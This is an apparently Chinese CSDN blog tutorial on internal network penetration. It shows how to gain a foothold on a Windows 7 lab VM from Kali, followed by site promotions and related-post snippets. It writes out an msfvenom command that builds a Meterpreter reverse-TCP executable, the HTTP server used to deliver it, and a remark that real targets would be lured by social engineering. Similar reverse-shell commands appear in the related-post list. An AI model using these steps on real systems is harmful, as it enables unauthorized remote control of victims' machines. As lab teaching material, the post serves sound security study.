【网络安全】内网渗透(一):获得权限

于 2024-01-27 10:20:04 发布
阅读量391 收藏 10
点赞数 9
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aobulaien001/article/details/135879312
版权

前言

本博文仅供学习使用,请勿他用!!!

网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;

本文将会介绍如何获取一个系统的权限

实战

准备

打开两个虚拟机,这里我用的是 kali 和 windows7,kali 作为攻击机,那么 windows7 就作为肉鸡;

查看两台机子的 IP:

Kali IP kali ip

Windows7 IP windows ip

ping 一下,可以连通,那就开始攻击准备; ping

攻击

1、生成一个针对 windows 的攻击文件,msf.exe

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.13.128 LPORT=4444 -f exe -o msf.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: msf.exe

2、另开窗口,打开 msfconsole,设置一下监听脚本:

3、将这个反弹 Payload 传给 windows,这里使用 python 建立连接,真实场景需要通过社工让目标接收并启动:

root@kali:~# python -m SimpleHTTPServer 888
Serving HTTP on 0.0.0.0 port 888 ...

在 windows 中,打开浏览器输入 ip:prot,点击 msf.exe 进行下载:

4、开始监听,然后运行 msf.exe 文件:

成功监听到了 windows;

5、接下来就可以进行一些简单的操作了,这里就不过多赘述:

后记

其实不难发现,我们只是获得了一个较低的权限,之后会介绍如何提升权限来做更多的事情;

1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
在这里插入图片描述
② 路线对应学习视频
在这里插入图片描述
😃朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以点下方链接免费领取
👉CSDN大礼包🎁:全网最全黑客资料免费领取🆓!(安全链接,放心点击)

2️⃣视频配套资料&国内外网安书籍、文档
① 文档和书籍资料
在这里插入图片描述
② 黑客技术
在这里插入图片描述
3️⃣网络安全源码合集+工具包
在这里插入图片描述
在这里插入图片描述
😃朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以点下方链接免费领取
👉CSDN大礼包🎁:全网最全黑客资料免费领取🆓!(安全链接,放心点击)

aobulaien001
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于域渗透与免杀对抗思考及其常见方式
03-16
域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位,域之间相互 访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。 当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可 以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互 通信和数据传输。 域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。 域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者 管理其他的域,每个域都有自己的安全策略,以及它与其他域的安全信任关系。 如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows域。
渗透完全技巧.pdf
10-03
1.无凭证情况下 网络扫描 漏洞快速探测 提权 拥有本地管理员权限 获取密码 绕过LSA防护策略读取密码 token窃取 查看本地存储的所有密码 卷影拷贝(获取域控所有hash) dpapi解密 2.内网信息收集 本机信息收集 8.获取当前用户密码 Windows Linux 浏览器 Navicat密码 xshell&xftp密码 mRemoteNG密码 扩散信息收集 常用端口扫描工具 内网拓扑架构分析 常见信息收集命令 第三方信息收集 3.获取域控的方法 SYSVOL MS14-068 Kerberos SPN扫描 Kerberos的黄金门票 Kerberos的银票务 域服务账号破解 凭证盗窃 NTLM relay Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
网络安全-渗透完整笔记
03-27
网络渗透是一种攻击手段,也是一种综合的高级攻击技术,也被成为“渗透测试” [3]。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞 [3]。换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是为了检测企业的安全防范中还有什么漏洞 [1]。渗透测试可以分为黑盒、白盒和灰盒三种,其中在项目中大多数以黑盒和白盒为主 [1]。黑盒测试是模仿真实环境下的黑客攻击,攻击者对项目从一无所知到逐步渗透,需要攻击者有较高的技术水平,时间消耗的也可能比较长,攻击者只要找到该企业的一个漏洞并以低成本高效率的拿下项目的权限,黑盒测试可以检测项目团队的对入侵的防范能力和被入侵时间的应对能力。
kali linux查看局域网下所有IP,并对指定IP攻击
weixin_44145452的博客
08-18 3406
因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击。前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址。来确认本机的ip地址。这样这个攻击就停止了。
使用KALI实现远程控制PC
weixin_42047210的博客
09-23 9066
使用KALI生成木马病毒实现远程控制 前言    该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。        我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:    1、VMware Workstation Pro 16(虚拟机)    下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4016
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
kali渗透内网和外网
weixin_62693307的博客
04-17 5672
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
利用kali下的msfvenom入侵电脑
热门推荐
qq_41453632的博客
10-28 3万+
需要的工具:msfvenom . msfconsole (kali里面有) msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行命令: msfconsole          (...
内网渗透思路.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
内网渗透知识大全1-87章全部教程
04-08
1.内网渗透(一)之基础知识-内网渗透介绍和概述 2.内网渗透(二)之基础知识-工作组介绍 3.内网渗透(三)之基础知识-域环境的介绍和优点 4.内网渗透(四)之基础知识-搭建域环境 5.内网渗透(五)之基础知识-Active ...
局域网内得到另外电脑的桌面图像及简单的控制
03-08
局域网内得到另外电脑的桌面图像及简单的控制在MFC中实现
使用kali对同一局域网内的设备进行断网和查看设备图片
goddreamyyh的博客
01-11 1万+
首先,如果kali是在虚拟机中运行的,需要使用桥接网络。 断网操作 1,首先,查看自己的IP,我的是192.168.1.125 命令:ifconfig 2,然后,查看当前局域网的还有那些设备。 命令:fping -g 192.168.1.125/24 3,然后选择一个设备作为攻击目标,拿自己的手机来做栗子>!< 查看了我的手机的IP为192.168.1.100(拿我...
Kali渗透测试之六提升权限
服务猿
05-12 3281
◆提升权限:获取目标系统的控制权是渗透成功的标志。审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统权限。审计人员还可以以该主机为跳板进一步攻击局域网络。(审计人员可能以各种方式获得与被控制系统有关的更多信息,具体地说,他们可能使用嗅探手段截获网络数据包,破解各种服务的密码,在局域网中使用网络欺骗手段...
kali中常见的三种扫描
m0_73451082的博客
07-10 3303
kali中输入 192.168.56.0/24 -sS -sV的思是扫描192.137.56这个网段下的存活ip地址的数量。在kali中输入ping 192.168.56.131 -c 4 的意思是192.168.56.131 这个IP 扫描四次。在kali中输入 192.168.56.131 -sS -sV的思是扫描对应ip的电脑的全部信息。​第一步 确保要扫描的电脑和执行扫描的电脑是否在同一个网段上。Kali里面查看ip地址的命令为ifconfig。
模拟黑客使用Kali Linux远程控制Windows(互联网)
HKBlackeagle的专栏
01-29 2978
通过内网穿透实现kali控制windows
同一局域网下如何爆破另一台主机密码(kali和win2003为例)
wrypot的博客
04-01 1383
下面是重点选择协议,协议必须是刚刚扫描出来的端口里面包含的协议,这里可以用smb协议,因为刚刚扫描的时候,445端口是开启的,445端口用的是smb协议。192.168.132.131是kali自己,剩下的192.168.132.129极有可能是win2003。打开hydra-gtk 这是hydra的可视化界面,hydra是命令行模式。填写用户名Administrator,密码选一个字典,点击开始。第一步:先看自己当前网段192.168.132.0/24。nmap扫描 扫描目标服务的版本端口。
Kali使用Metasploit内、外网渗透windows系统
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
内网渗透 -- 获取内网中其他主机权限
weixin_41489908的博客
07-04 2235
每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.144 小小受:win7 x64 ,ip: 192.168.1.130 一、生成木马及监听主机参考上篇文章: 二、获取小受的IP地址 meterpreter > getsystem ...
kali linux外网渗透指定ip,kali Linux局域网渗透之win10
weixin_39796152的博客
05-04 4125
kali机:192.168.198.134win10:192.168.198.1我们先来查看下自己的IP地址watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)2020-1-1...
内网安全攻防:渗透测试实战指南 pdf下载
07-29
对于内网安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内网的安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值